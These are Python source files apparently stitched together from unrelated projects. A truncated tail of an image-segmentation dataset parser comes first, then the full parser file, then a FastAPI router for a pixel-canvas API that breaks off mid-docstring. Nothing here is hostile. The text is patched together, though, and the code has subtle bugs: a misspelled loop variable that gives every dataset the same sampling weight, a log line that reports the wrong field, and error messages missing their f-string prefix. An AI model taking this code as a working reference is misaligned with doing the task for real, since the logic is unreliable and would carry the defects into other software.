return input_raster, imap, annotations
def _geometry_transform_from_data(self, transform_data: typing.Dict):
if transform_data["type"] == "affine":
return pi_transform.PiRandomAffineTransform(
input_width=self._sample_size,
input_height=self._sample_size,
output_width=self._input_width,
output_height=self._input_height,
**transform_data,
)
raise ValueError(
f"Geometry transform type '{transform_data["type"]}' not recognized."
)
def _color_transform_from_data(self, transform_data: typing.Dict):
if transform_data["type"] == "hsv":
return pi_transform.PiRandomHsvTransform(**transform_data)
elif transform_data["type"] == "contrast":
return pi_transform.PiRandomContrastTransform(**transform_data)
elif transform_data["type"] == "blur":
return pi_transform.PiRandomBlurTransform(**transform_data)
raise ValueError(
f"Color transform type '{transform_data["type"]}' not recognized."
)
def _input_mean_from_config(self) -> typing.List[float]:
mean = []
for input_layer_data in self._config["input_layers"]:
mean += input_layer_data["mean"]
return mean
def _input_std_from_config(self) -> typing.List[float]:
std = []
for input_layer_data in self._config["input_layers"]:
std += input_layer_data["std"]
return std
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is covered by the LICENSE file in the root of this project.
from __future__ import annotations
import pathlib
import typing
import cv2
import numpy as np
from piutils.piutils import pi_log
from . import pi_dataset
from . import pi_transform
logger = pi_log.get_logger(__name__)
class PiParser:
"""A dataset parser for a instance segmentation, object detcetion or semantic segmentation network.
Implements __len__ and __getitem__ as the PyTorch's map-style dataset class
(but has no PyTorch dependencies).
As we frequently deal with images larger that GPU memory, the parser works
by sampling subregions from images in a custom dataset format.
The sampling behaviour is reproducable. For a given item index n and parser config,
__getitem__(n) will always sample the same region and
apply the same data augmentation (if specified in the config).
Usage:
parser = PiParser(
config={...}, split_name="train", numpy_to_tensor_func=torch.from_numpy
)
for input_image, target_dict in parser:
instance_class_labels = target_dict["labels"] # shape (num_instances,)
instance_masks = target_dict["masks"] # shape (num_instances, target_height, target_width)
instance_bounding_boxes = target_dict["boxes"] # shape (num_instances, 4)
For a complete usage example, see examples/parser.py.
"""
def __init__(
self,
split_name: str,
num_samples: int,
config: typing.Dict,
numpy_to_tensor_func: typing.Optional[
typing.Callable[[np.ndarray], typing.Any]
] = None,
):
"""
Args:
split_name:
Name of the dataset split to be parsed (same as used in config).
Allows different settings for each split withing the same config file.
Typical options 'train', 'val' and 'test'.
num_samples:
Number of random image subregions to be sampled. Set to a multiple of the batch size.
config:
A nested dictionary that defines from where and how the data is parsed.
Important configuration parameters are:
'datasets', {split_name}:
A list of datasets to draw samples from. Each item is a dictionary
with keys:
'path':
Where to find the dataset on disk.
'sampling_weight':
Proportional to the frequency samples are drawn from this dataset.
Not relevant if there is only a single dataset in the list.
'input_layers':
A list of input layers (should be present in all parsed datasets).
Each item in a dictionary with keys:
'name':
E.g. 'rgb'.
'channels':
The number of channels, e.g. 3.
'mean' and 'std':
Two arrays of floats used for input normalization, i.e.,
input_normalized = (input - mean) / std.
Size should be equal to 'channels'.
'instance_filter':
A dictonary with keys 'min_box_area', 'min_mask_area'.
Instances with a bounding box or a mask smaller than these
values are filtered out.
'model_input':
The input size of the network.
A dictionary with keys 'height' and 'width'.
'model_output':
The output size of the network.
A dictionary with keys 'height', 'width', 'offset_x', 'offset_y', 'stride_x', 'stride_y'.
Height and width are given with respect to the model input, i.e.,
if input_image (a numpy.ndarray) is the network input,
the subregion that overlaps the network output 1:1 is:
image[
output_offset_y : output_offset_y + output_height : output_stride_y,
output_offset_x : output_offset_x + output_width : output_stride_x,
]
The spatial dimensions of the return target tensors are:
target_height = height // stride_y
target_width = width // stride_x
'required_targets':
A dictionary with keys
'area',
'boxes',
'iscrowd',
'keypoints',
'labels',
'masks',
'semantics',
and boolean values.
Determines which outputs the parser should provide, also see __getitem__.
'samplers', {split_name}:
A list of sampling strategies. The 'weight' parameter determines the frequence
the strategy in question is used. There are two sampling strategies:
'uniform':
Samples a patch anyhwhere within the image.
'instances':
Samples a patch from image regions with plant instances
the frequence of each class is determined by the 'sampling_weight',
see 'semantic_labels'.
See examples/parser.py for details.
'seed', {split_name}:
Used to initialize the random state and have reproducable sampling behaviour.
'semantic_labels':
A list of semantic class labels contained in the parsed dataset (and learned by the model).
Each item is a dictionary with keys:
'name':
Name of the semantic class.
'color':
Used for visualization.
'has_instances'
A boolean. True if this is a class that sould be considered to have instances.
'join_with':
A list of other labels present in the dataset to be remapped to this class.
'sampling_weight':
Used by the 'instances' sampler. Roughly proportional to the frequency
representatives of this class are contained in the parsed images.
'transforms', {split_name}:
A list of random transforms applied to each split of the dataset for data augmentation.
numpy_to_tensor_func:
A framework-dependent conversion function to make a tensor out of a numpy.ndarray.
If None, no conversion is performed and returned type is numpy.ndarray.
Options might be
torch.from_numpy (PyTorch) and
tf.convert_to_tensor (Tensorflow).
"""
self._config = config
self._split_name = split_name
self._numpy_to_tensor_func = numpy_to_tensor_func
self._input_width = self._config["model_input"]["width"]
self._input_height = self._config["model_input"]["height"]
self._output_width = self._config["model_output"]["width"]
self._output_height = self._config["model_output"]["height"]
self._output_offset_x = self._config["model_output"]["offset_x"]
self._output_offset_y = self._config["model_output"]["offset_y"]
self._output_stride_x = self._config["model_output"]["stride_x"]
self._output_stride_y = self._config["model_output"]["stride_y"]
self._size = num_samples
seed = self._config["seed"][self._split_name]
random = np.random.RandomState(seed)
self._seeds = random.choice(
2 ** 32, size=self._size
) # one random seed for each item
# get datasets for this split from config
datasets_data = [
dataset_data for dataset_data in self._config["datasets"][self._split_name]
]
dataset_data_per_dataset = {
pi_dataset.PiDataset(path=pathlib.Path(dataset_data["path"])): dataset_data
for dataset_data in datasets_data
}
# get semantic labels from config
self._semantic_labels = {
semantic_label_data["name"]: {
"sampling_weight": semantic_label_data["sampling_weight"],
"index": semantic_label_index,
"join_with": semantic_label_data["join_with"],
"has_instances": semantic_label_data["has_instances"],
"color": semantic_label_data["color"],
}
for semantic_label_index, semantic_label_data in enumerate(
self._config["semantic_labels"]
)
}
logger.info("Semantic labels:")
for semantic_label_name, semantic_label_data in self._semantic_labels.items():
logger.info(f" * '{semantic_label_name}':")
logger.info(f" Index: {semantic_label_data['index']}")
logger.info(
f" Sampling weight: {semantic_label_data['sampling_weight']}"
)
logger.info(
f" Has instances: {semantic_label_data['sampling_weight']}"
)
# prepare the 'join_with' option
# remap a group of labels to a single class
self._semantic_labels_mapping = {
**{
semantic_label_name: semantic_label_name
for semantic_label_name in self._semantic_labels
},
**{
semantic_label_to_join: semantic_label_name
for semantic_label_name, semantic_label_data in self._semantic_labels.items()
for semantic_label_to_join in semantic_label_data["join_with"]
},
}
logger.info(f"Remap semantic labels '{self._split_name}':")
for (
semantic_label_name,
mapped_to_name,
) in self._semantic_labels_mapping.items():
logger.info(f" * {semantic_label_name} \u2192 {mapped_to_name}")
# get samplers for this split from config
samplers_data = [
{"type": sampler_type, **sampler_data}
for sampler_dict in self._config["samplers"][self._split_name]
for sampler_type, sampler_data in sampler_dict.items()
]
if not samplers_data:
raise ValueError(f"No samplers defined for split: '{self._split_name}'")
# get valid instances samplings index (list of instances that are allowed to be sampled)
# if instances sampler is used (some datasets can contain no instance of any semantic class)
if any((sampler_data["type"] == "instances" for sampler_data in samplers_data)):
self._instances_sampling_index_data_per_dataset = {}
self._instances_sampling_weights_per_dataset = {}
for dataset in dataset_data_per_dataset.keys():
sampling_index_data = dataset.sampling_index("instances")
semantic_labels_to_join = [
[semantic_label_data["name"]] + semantic_label_data["join_with"]
for semantic_label_data in self._config["semantic_labels"]
if semantic_label_data["has_instances"]
]
sampling_index_data = {
semantic_label_names[0]: [
sampling_item
for semantic_label_name in semantic_label_names
if semantic_label_name in sampling_index_data
for sampling_item in sampling_index_data[semantic_label_name]
]
for semantic_label_names in semantic_labels_to_join
}
# filter out those labels that do not have any items
sampling_index_data = {
semantic_label_name: sampling_item_data
for semantic_label_name, sampling_item_data in sampling_index_data.items()
if sampling_item_data
}
semantic_label_sampling_weights_norm = sum(
self._semantic_labels[semantic_label_name]["sampling_weight"]
for semantic_label_name in sampling_index_data
)
semantic_label_sampling_weights = [
self._semantic_labels[semantic_label_name]["sampling_weight"]
/ semantic_label_sampling_weights_norm
for semantic_label_name in sampling_index_data
]
if sampling_index_data and semantic_label_sampling_weights_norm > 0.0:
self._instances_sampling_index_data_per_dataset[
dataset
] = sampling_index_data
self._instances_sampling_weights_per_dataset[
dataset
] = semantic_label_sampling_weights
else:
logger.warning(
f"No instances to sample in dataset '{dataset.name}', split '{self._split_name}'."
)
# get valid samplers per dataset
self._sampler_data_per_dataset = {}
self._sampler_weight_per_dataset = {}
for dataset in dataset_data_per_dataset.keys():
if dataset_data_per_dataset[dataset]["sampling_weight"] <= 0.0:
logger.warning(
f"Dataset '{dataset.name}', split '{self._split_name}' with non-positive sampling weight."
)
continue
samplers_data_for_dataset = []
samplers_weights_for_dataset = []
for sampler_data in samplers_data:
accept = False
if sampler_data["type"] not in ["uniform", "instances"]:
raise NotImplementedError(
"Sampler '{sampler_data['type']}' not recognized."
)
if sampler_data["type"] in ["uniform"] and sampler_data["weight"] > 0.0:
accept = True
if (
sampler_data["type"] in ["instances"]
and sampler_data["weight"] > 0.0
and dataset
in self._instances_sampling_index_data_per_dataset # exclude if not instances to sample
):
accept = True
if accept:
samplers_data_for_dataset.append(sampler_data)
samplers_weights_for_dataset.append(sampler_data["weight"])
else:
logger.warning(
f"Sampler '{sampler_data['type']}' invalid for dataset '{dataset.name}', "
f"split '{self._split_name}'."
)
if samplers_data_for_dataset:
samplers_weights_norm = sum(samplers_weights_for_dataset)
if samplers_weights_norm <= 0.0:
raise ValueError(
"Invalid sampling configuration for dataset '{dataset.name}', "
f"split '{self._split_name}'."
)
samplers_weights_for_dataset = [
weight / samplers_weights_norm
for weight in samplers_weights_for_dataset
]
self._sampler_data_per_dataset[dataset] = samplers_data_for_dataset
self._sampler_weight_per_dataset[dataset] = samplers_weights_for_dataset
else:
logger.warning(
f"Ignoring dataset '{dataset.name}', "
f"split '{self._split_name}' with no valid samplers."
)
if not self._sampler_data_per_dataset:
raise ValueError(
f"No valid samplers for split '{self._split_name}'. "
"If samples 'instances' is used as the only sampler, "
"make sure one of dataset contains instances with the "
"semantic labels defined in the config."
)
# keep those datasets with valid samplers
self._datasets = [dataset for dataset in self._sampler_data_per_dataset.keys()]
datasets_sampling_weights = [
dataset_data_per_dataset[dataset]["sampling_weight"]
for datset in self._datasets
]
datasets_sampling_weights_norm = sum(datasets_sampling_weights)
self._datasets_sampling_weights = [
weight / datasets_sampling_weights_norm
for weight in datasets_sampling_weights
]
logger.info(
f"Using {len(self._datasets)} dataset(s) from split '{self._split_name}':"
)
for dataset, sampling_weight in zip(
self._datasets, self._datasets_sampling_weights
):
logger.info(f" * Name: {dataset.name}")
logger.info(f" Sampling weight (normalized): {sampling_weight}")
logger.info(
f" Samplers: "
+ str(
[
sampler_data["type"]
for sampler_data in self._sampler_data_per_dataset[dataset]
]
)
)
logger.info(
f" Sampler weights (normalized): {self._sampler_weight_per_dataset[dataset]}"
)
# get transforms for this split from config
self._geometry_transforms_data = [
{"type": transform_type, **transform_data}
for transform_dict in self._config["transforms"][self._split_name]
for transform_type, transform_data in transform_dict.items()
if transform_type in {"affine"}
]
self._color_transforms_data = [
{"type": transforms_type, **transforms_data}
for transforms_dict in self._config["transforms"][self._split_name]
for transforms_type, transforms_data in transforms_dict.items()
if transforms_type in {"hsv", "contrast", "blur"}
]
logger.info(
f"Using {len(self._geometry_transforms_data)} "
f"+ {len(self._color_transforms_data)} random transforms for data augmentation:"
)
for transform_data in (
self._geometry_transforms_data + self._color_transforms_data
):
logger.info(f" * Type: {transform_data['type']}")
sample_size = np.max([self._input_width, self._input_height])
affine_transform_data = next(
(
transform_data
for transform_data in self._geometry_transforms_data
if transform_data["type"] == "affine"
),
None,
)
if affine_transform_data is not None:
scaling_max = np.max(
np.absolute(
[
affine_transform_data["scaling_x_min"],
affine_transform_data["scaling_x_max"],
affine_transform_data["scaling_y_min"],
affine_transform_data["scaling_y_max"],
]
)
)
sample_size *= scaling_max
shearing_max = np.max(
np.absolute(
[
affine_transform_data["shearing_x_min"],
affine_transform_data["shearing_x_max"],
affine_transform_data["shearing_y_min"],
affine_transform_data["shearing_y_max"],
]
)
)
if shearing_max != 0.0:
sample_size += np.absolute(np.sin(shearing_max) * sample_size)
translation_max = np.max(
np.absolute(
[
affine_transform_data["translation_x_min"],
affine_transform_data["translation_x_max"],
affine_transform_data["translation_y_min"],
affine_transform_data["translation_y_max"],
]
)
)
sample_size += translation_max
rotation_max = np.max(
np.absolute(
[
affine_transform_data["rotation_min"],
affine_transform_data["rotation_max"],
]
)
)
if rotation_max != 0.0:
sample_size *= np.sqrt(2.0)
sample_size = np.ceil(sample_size).astype(np.int).item()
self._sample_size = sample_size
logger.info(f"Drawing samples of size: {self._sample_size}")
self._geometry_transforms = [
self._geometry_transform_from_data(transform_data)
for transform_data in self._geometry_transforms_data
]
self._color_transforms = [
self._color_transform_from_data(transform_data)
for transform_data in self._color_transforms_data
]
# get input layers and normalization from config
mean = self._input_mean_from_config()
std = self._input_std_from_config()
input_layer_names = []
input_channels = 0
for input_layer_data in self._config["input_layers"]:
input_layer_names += [input_layer_data["name"]]
input_channels += input_layer_data["channels"]
self._input_layer_names = input_layer_names
self._input_channels = input_channels
self._mean = np.asarray(mean, dtype=np.float32).reshape(1, 1, -1)
self._std = np.asarray(std, dtype=np.float32).reshape(1, 1, -1)
logger.info("Input layers:")
for input_layer_data in self._config["input_layers"]:
logger.info(f" * Name: {input_layer_data['name']}")
logger.info(f" * Channels: {input_layer_data['channels']}")
@property
def config(self) -> typing.Dict:
return self._config
@property
def semantic_labels(self) -> typing.Dict:
return self._semantic_labels
@property
def semantic_labels_mapping(self) -> typing.Dict[str, str]:
return self._semantic_labels_mapping
@property
def mean(self) -> np.ndarray:
return self._mean
@property
def std(self) -> np.ndarray:
return self._std
@property
def output_width(self) -> int:
return self._output_width
@property
def output_height(self) -> int:
return self._output_height
@property
def output_offset_x(self) -> int:
return self._output_offset_x
@property
def output_offset_y(self) -> int:
return self._output_offset_y
@property
def output_stride_x(self) -> int:
return self._output_stride_x
@property
def output_stride_y(self) -> int:
return self._output_stride_y
def _sample(self, random: np.random.RandomState) -> typing.Dict[str, np.ndarray]:
dataset = random.choice(
self._datasets, p=self._datasets_sampling_weights, replace=False
)
if __debug__:
logger.debug(
f"Sample from dataset '{dataset.name}' (split '{self._split_name}')."
)
sampler_data = random.choice(
self._sampler_data_per_dataset[dataset],
p=self._sampler_weight_per_dataset[dataset],
replace=False,
)
if __debug__:
logger.debug(f"Using sampler '{sampler_data['type']}'.")
if sampler_data["type"] == "uniform":
dataset_item_names = list(dataset.items.keys())
dataset_item_name = random.choice(dataset_item_names, replace=False)
if __debug__:
logger.debug(f"Sampling from dataset item '{dataset_item_name}'.")
dataset_item = dataset.items[dataset_item_name]
offset_x = sampler_data["offset_from_boundary_x"]
offset_y = sampler_data["offset_from_boundary_y"]
if offset_x > dataset_item.width - offset_x:
raise RuntimeError(
"Offset from boundary ({offset_x}) larger than "
f"half raster width ({dataset_item.width}): {dataset_item_name}"
)
if offset_y > dataset_item.height - offset_y:
raise RuntimeError(
"Offset from boundary ({offset_y}) larger than "
f"half raster height ({dataset_item.height}): {dataset_item_name}"
)
seed_x = random.uniform(offset_x, dataset_item.width - offset_x)
seed_y = random.uniform(offset_y, dataset_item.height - offset_y)
elif sampler_data["type"] == "instances":
sampling_index_data = self._instances_sampling_index_data_per_dataset[
dataset
]
semantic_label_sampling_weights = (
self._instances_sampling_weights_per_dataset[dataset]
)
if not sampling_index_data:
raise ValueError(
f"No instances in sampling index of dataset: '{dataset.path}'"
)
semantic_label_name = random.choice(
list(sampling_index_data.keys()),
p=semantic_label_sampling_weights,
replace=False,
)
sampling_seed_data = random.choice(
sampling_index_data[semantic_label_name], replace=False
)
dataset_item_name = sampling_seed_data["itemName"]
if __debug__:
logger.debug(f"Sampling from dataset item '{dataset_item_name}'.")
dataset_item = dataset.items[dataset_item_name]
seed_x = sampling_seed_data["coordinates"][0]
seed_y = sampling_seed_data["coordinates"][1]
else:
raise NotImplementedError(
"Sampler not implemented: '{sampler_data['type']}'"
)
seed_x = np.round(seed_x).astype(np.int).item()
seed_y = np.round(seed_y).astype(np.int).item()
x = seed_x - self._sample_size // 2
y = seed_y - self._sample_size // 2
width = self._sample_size
height = self._sample_size
input_raster, imap, annotations = self._query_region_from_map(
dataset_item=dataset_item, x=x, y=y, width=width, height=height
)
# apply transforms
for geometry_transform in self._geometry_transforms:
geometry_transform.resample(random=random)
input_raster = geometry_transform.transform_raster(
input_raster, fill_value=0.0, interpolation="linear"
)
imap = geometry_transform.transform_raster(
imap, fill_value=pi_dataset.IMAP_IGNORE, interpolation="nearest"
)
for annotation_object_id, annotation_object_data in annotations.items():
if "keypoints" in annotation_object_data:
keypoint_positions = np.asarray(
[
keypoint_data["coordinates"]
for keypoint_data in annotation_object_data["keypoints"]
]
)
if keypoint_positions.size:
keypoint_positions = geometry_transform.transform_points(
keypoint_positions
)
annotation_object_data["keypoints"] = [
{"coordinates": keypoint_positions[keypoint_index].tolist()}
for keypoint_index in range(keypoint_positions.shape[0])
]
for color_transform in self._color_transforms:
color_transform.resample(random=random)
input_raster = color_transform.transform_raster(
input_raster, fill_value=0.0, interpolation="linear"
)
# normalize input
input_raster = (input_raster.astype(np.float32) - self._mean) / self._std
input_raster = input_raster.transpose((2, 0, 1)) # channels first
if __debug__:
logger.debug(f"Input raster shape: {input_raster.shape}")
logger.debug("Input raster range (after normalization):")
for channel_index in range(input_raster.shape[0]):
input_band = input_raster[channel_index]
logger.debug(f" * Band {channel_index}:")
logger.debug(f" Min: {input_band.min()}")
logger.debug(f" Max: {input_band.max()}")
logger.debug(f" Mean: {input_band.mean()}")
logger.debug(f" Dtype: {input_band.dtype}")
# debug output
# cv2.imshow(f"input_band_{channel_index}", input_band)
# cv2.waitKey()
# imap to output size of model
imap = imap[
self._output_offset_y : (
self._output_offset_y + self._output_height
) : self._output_stride_y,
self._output_offset_x : (
self._output_offset_x + self._output_width
) : self._output_stride_x,
]
target = self._make_target(
imap=imap,
annotations=annotations,
geometry_transforms=self._geometry_transforms,
)
return self._numpy_to_tensor(input_raster), target
def _make_target(
self,
imap: np.ndarray,
annotations: typing.Dict,
geometry_transforms: typing.List[pidata.pi_transform.PiRandomTransform],
) -> typing.Dict[str, typing.Union[np.ndarray, typing.Any]]:
imap_ids = np.unique(imap)
target_height = self._output_height // self._output_stride_y
target_width = self._output_width // self._output_stride_x
if self._config["required_targets"]["semantics"]:
semantics = np.zeros(
(target_height, target_width),
dtype=np.int64,
)
# per-instance annotations
if self._config["required_targets"]["boxes"]:
boxes = []
if self._config["required_targets"]["labels"]:
labels = []
if self._config["required_targets"]["area"]:
area = []
if self._config["required_targets"]["iscrowd"]:
iscrowd = []
if self._config["required_targets"]["masks"]:
masks = []
if self._config["required_targets"]["keypoints"]:
keypoints = []
max_x = np.floor(self._output_width / self._output_stride_x)
max_y = np.floor(self._output_width / self._output_stride_y)
for annotation_object_id, annotation_object in annotations.items():
if (
annotation_object["type"] in ["segment", "instance"]
and "imapIds" in annotation_object
and any(
(
annotation_imap_id in imap_ids
for annotation_imap_id in annotation_object["imapIds"]
)
)
):
annotation_mask = np.isin(imap, annotation_object["imapIds"])
semantic_label_name = annotation_object["semanticLabelName"]
if semantic_label_name not in self.semantic_labels:
logger.warning(f"Ignore unknown label: {semantic_label_name}")
continue
if not self.semantic_labels[semantic_label_name]["has_instances"]:
continue
semantic_label_index = self.semantic_labels[semantic_label_name][
"index"
]
if self._config["required_targets"]["semantics"]:
semantics[annotation_mask] = semantic_label_index
if annotation_object["type"] in ["instance"]:
annotation_mask_uint8 = annotation_mask.astype(np.uint8)
box_x, box_y, box_width, box_height = cv2.boundingRect(
annotation_mask_uint8.astype(np.uint8)
)
box_x0 = np.clip(box_x, 0.0, max_x)
box_x1 = np.clip(box_x + box_width, 0.0, max_x)
box_y0 = np.clip(box_y, 0.0, max_y)
box_y1 = np.clip(box_y + box_height, 0.0, max_y)
box = np.asarray([box_x0, box_y0, box_x1, box_y1])
box_area = (box[2] - box[0]) * (box[3] - box[1])
if (
"instance_filter" in self.config
and box_area < self.config["instance_filter"]["min_box_area"]
):
continue
if "instance_filter" in self.config and (
annotation_mask.sum()
< self.config["instance_filter"]["min_mask_area"]
):
continue
if self._config["required_targets"]["boxes"]:
boxes.append(box)
if self._config["required_targets"]["area"]:
area.append(box_area)
if self._config["required_targets"]["labels"]:
labels.append(semantic_label_index)
if self._config["required_targets"]["iscrowd"]:
iscrowd.append(0)
if self._config["required_targets"]["masks"]:
masks.append(annotation_mask_uint8)
if self._config["required_targets"]["keypoints"]:
if (
"keypoints" in annotation_object
and annotation_object["keypoints"]
):
keypoint_position = (
np.asarray(
annotation_object["keypoints"][0]["coordinates"],
dtype=np.float32,
)
- np.asarray(
[self._output_offset_x, self._output_offset_y],
dtype=np.float32,
)
) / np.asarray(
[self._output_stride_x, self._output_stride_y],
dtype=np.float32,
)
keypoint_is_visible = (
keypoint_position[0] >= 0
and keypoint_position[0] < self._output_width
and keypoint_position[1] >= 0.0
and keypoint_position[1] < self._output_height
)
else:
keypoint_is_visible = False
if keypoint_is_visible:
keypoints.append(
np.asarray(
[[keypoint_position[0], keypoint_position[1], 1.0]],
dtype=np.float32,
)
)
else:
keypoints.append(
np.asarray([[0.0, 0.0, 0.0]], dtype=np.float32)
)
target = {}
if self._config["required_targets"]["semantics"]:
semantics[imap == pi_dataset.IMAP_IGNORE] = len(self.semantic_labels)
target["semantics"] = self._numpy_to_tensor(semantics)
if self._config["required_targets"]["boxes"]:
target["boxes"] = self._numpy_to_tensor(
np.asarray(boxes, dtype=np.float32).reshape(-1, 4)
)
if self._config["required_targets"]["labels"]:
target["labels"] = self._numpy_to_tensor(
np.asarray(labels, dtype=np.int64).reshape(-1)
)
if self._config["required_targets"]["area"]:
target["area"] = self._numpy_to_tensor(
np.asarray(area, dtype=np.float32).reshape(-1)
)
if self._config["required_targets"]["iscrowd"]:
target["iscrowd"] = self._numpy_to_tensor(
np.asarray(iscrowd, dtype=np.uint8).reshape(-1)
)
if self._config["required_targets"]["masks"]:
target["masks"] = self._numpy_to_tensor(
np.asarray(masks, dtype=np.uint8).reshape(
-1, target_height, target_width
)
)
if self._config["required_targets"]["keypoints"]:
target["keypoints"] = self._numpy_to_tensor(
np.asarray(keypoints, dtype=np.float32).reshape(-1, 1, 3)
)
return target
def get_height_and_width(self) -> typing.Tuple[int, int]:
"""
Returns:
A tuple (height, width). The size of the parsed input images.
"""
return self._input_height, self._input_width
def __len__(self) -> int:
"""
Returns:
The total number of samples that cam be drawn.
"""
return self._size
def __getitem__(
self, index: int
) -> typing.Tuple[np.ndarray, typing.Dict[str, np.ndarray]]:
"""
Returns:
A tuple of an input image and target (a dictionary).
The tensor data type depends on the numpy_to_tensor_func
given in the constructor and is numpy.ndarray by default.
The target is a dictionary with keys as indicated
in 'required_targets' in the config passed to the parser.
Options are:
'semantics':
A tensor of shape (height, width), dtype int64
with semantic label IDs. IDs start from 0 and range to
{number of semantic labels} as given in the config dictionary
passed to the parser.
ID 0 marks Soil/Background pixels.
The highest ID == <number of semantic classes> marks pixels
to be ignored (if applicable for the model):
0 -> first semantic label in config (should be Soil/Background),
1 -> second semantic label in config,
2 -> third semantic label in config,
...
{number of semantic classes} -> pixels to be ignored
'boxes':
A tensor of shape (num_instances, 4) and dtype float32.
Bounding box coordinates of each instance in order x0, y0, x1, y1.
'labels':
A tensor of shape (num_instances,) and dtype int64.
The semantic label ID per instance.
Also see 'semantics'.
'area':
A tensor of shape (num_instances,) and dtype float32.
The area of each instance's bounding box.
Can be used for evaluation.
'iscrowd':
A tensor of shape (num_instances,) and dtype uint8.
COCO-like. For now, always 0.
'masks':
A tensor of shape (num_instances, height, width) and dtype uint8.
The binary mask of each instance.
'keypoints':
A tensor of shape (num_instances, 1, 3) and dtype uint8.
Stem keypoint positions in x, y, visibility.
If visibility is 0, x and y are also 0.
'image_id' (always returned):
A tensor of shape (,) and dtype int64.
Equals the index of this sample.
"""
input_raster, target = self._sample(
random=np.random.RandomState(self._seeds[index])
)
target["image_id"] = self._numpy_to_tensor(np.asarray(index, dtype=np.int64))
return input_raster, target
def _numpy_to_tensor(self, numpy_array) -> typing.Union[np.ndarray, typing.Any]:
if self._numpy_to_tensor_func is not None:
return self._numpy_to_tensor_func(numpy_array)
else:
return numpy_array
def _query_region_from_map(
self, dataset_item: CiDatasetItemType, x: int, y: int, width: int, height: int
) -> typing.Tuple[np.ndarray, np.ndarray, typing.Dict]:
"""
Returns:
Tuple of input raster, imap and annotations (not transformed!).
"""
input_rasters = []
for input_layer_name in self._input_layer_names:
raster = dataset_item.map.provide_raster(
raster_layer_name=input_layer_name, x=x, y=y, width=width, height=height
).reshape(height, width, -1)
if raster.dtype in [np.uint8, np.uint16]:
raster = (raster.astype(np.float32) / 255.0).clip(0.0, 1.0)
elif raster.dtype in [np.float, np.float32]:
raster = raster.astype(np.float32)
else:
raise NotImplementedError()
input_rasters.append(raster)
input_raster = np.concatenate(input_rasters, axis=-1)
imap = (
dataset_item.map.provide_raster(
raster_layer_name="imap", x=x, y=y, width=width, height=height
)
.reshape(height, width)
.astype(np.uint16)
)
annotations = dataset_item.map.query_intersection(
vector_layer_name="annotations",
x=x,
y=y,
width=width,
height=height,
resolve_objects=True,
)
# transform annotations
for annotation_object_id, annotation_object_data in annotations.items():
if "boundingBox" in annotation_object_data:
del annotation_object_data["boundingBox"]
if "keypoints" in annotation_object_data:
annotation_object_data["keypoints"] = [
{
"coordinates": [
keypoint_data["coordinates"][0] - x,
keypoint_data["coordinates"][1] - y,
]
}
for keypoint_data in annotation_object_data["keypoints"]
]
if "semanticLabelName" in annotation_object_data:
semantic_label_name = annotation_object_data["semanticLabelName"]
if semantic_label_name in self._semantic_labels_mapping:
annotation_object_data[
"semanticLabelName"
] = self._semantic_labels_mapping[
annotation_object_data["semanticLabelName"]
]
else:
# map to first semantic label in list, it should usually be the Soil/Background class
logger.error(
f"Unexpected semantic label '{semantic_label_name}' "
f"in dataset item '{dataset_item.name}' "
f"in dataset '{dataset_item.dataset.name}' ({dataset_item.path})."
)
annotation_object_data["semanticLabelName"] = next(
iter(self._semantic_labels_mapping.keys())
)
return input_raster, imap, annotations
def _geometry_transform_from_data(self, transform_data: typing.Dict):
if transform_data["type"] == "affine":
return pi_transform.PiRandomAffineTransform(
input_width=self._sample_size,
input_height=self._sample_size,
output_width=self._input_width,
output_height=self._input_height,
**transform_data,
)
raise ValueError(
f"Geometry transform type '{transform_data['type']}' not recognized."
)
def _color_transform_from_data(self, transform_data: typing.Dict):
if transform_data["type"] == "hsv":
return pi_transform.PiRandomHsvTransform(**transform_data)
elif transform_data["type"] == "contrast":
return pi_transform.PiRandomContrastTransform(**transform_data)
elif transform_data["type"] == "blur":
return pi_transform.PiRandomBlurTransform(**transform_data)
raise ValueError(
f"Color transform type '{transform_data['type']}' not recognized."
)
def _input_mean_from_config(self) -> typing.List[float]:
mean = []
for input_layer_data in self._config["input_layers"]:
mean += input_layer_data["mean"]
return mean
def _input_std_from_config(self) -> typing.List[float]:
std = []
for input_layer_data in self._config["input_layers"]:
std += input_layer_data["std"]
return std
|
import logging
from fastapi import APIRouter, Depends, HTTPException, Request, Response
from pixels.constants import Ratelimits, Sizes
from pixels.models import GetSize, Message, Pixel
from pixels.utils import auth, ratelimits
log = logging.getLogger(__name__)
# By only adding the JWT dependency to the submounted router we can have size() be un-authenticated
router = APIRouter(prefix="/canvas", tags=["Canvas Endpoints"])
# We include this at the bottom
secure = APIRouter(dependencies=[Depends(auth.JWTBearer())])
@router.get("/size", response_model=GetSize)
async def size() -> GetSize:
"""
Get the size of the Pixels canvas.
You can use the data this endpoint returns to build some cool scripts
that can start the ducky uprising on the canvas!
This endpoint doesn't require any authentication so don't worry
about the headers usually required.
#### Example Python Script
```py
import requests
r = requests.get("https://pixels.pythondiscord.com/size")
payload = r.json()
canvas_height = payload["height"]
canvas_width = payload["width"]
print(f"We got our canvas size! Height: {canvas_height}, Width: {canvas_width}.")
```
"""
return GetSize(width=Sizes.WIDTH, height=Sizes.HEIGHT)
@secure.get("/pixels", response_class=Response, responses={
200: {
"description": "Successful Response.",
"content": {
"application/octet-stream": {
"schema": {
"type": "application/octet-stream",
"format": "binary"
}
}
}
}
})
@ratelimits.UserRedis(
requests=Ratelimits.GET_PIXELS_AMOUNT,
time_unit=Ratelimits.GET_PIXELS_RATE_LIMIT,
cooldown=Ratelimits.GET_PIXELS_RATE_COOLDOWN
)
async def canvas_pixels(request: Request) -> Response:
"""
Get the current state of all pixels from the canvas.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
headers = {"Authorization": f"Bearer {token}"}
r = requests.get("https://pixels.pythondiscord.com/pixels", headers=headers)
data = r.content
# have fun processing the returned data...
```
"""
return Response(
await request.state.canvas.get_pixels(),
media_type="application/octet-stream"
)
@secure.get("/pixel", response_model=Pixel)
@ratelimits.UserRedis(
requests=Ratelimits.GET_PIXEL_AMOUNT,
time_unit=Ratelimits.GET_PIXEL_RATE_LIMIT,
cooldown=Ratelimits.GET_PIXEL_RATE_COOLDOWN
)
async def get_pixel(x: int, y: int, request: Request) -> Pixel:
"""
Get a single pixel given the x and y coordinates.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
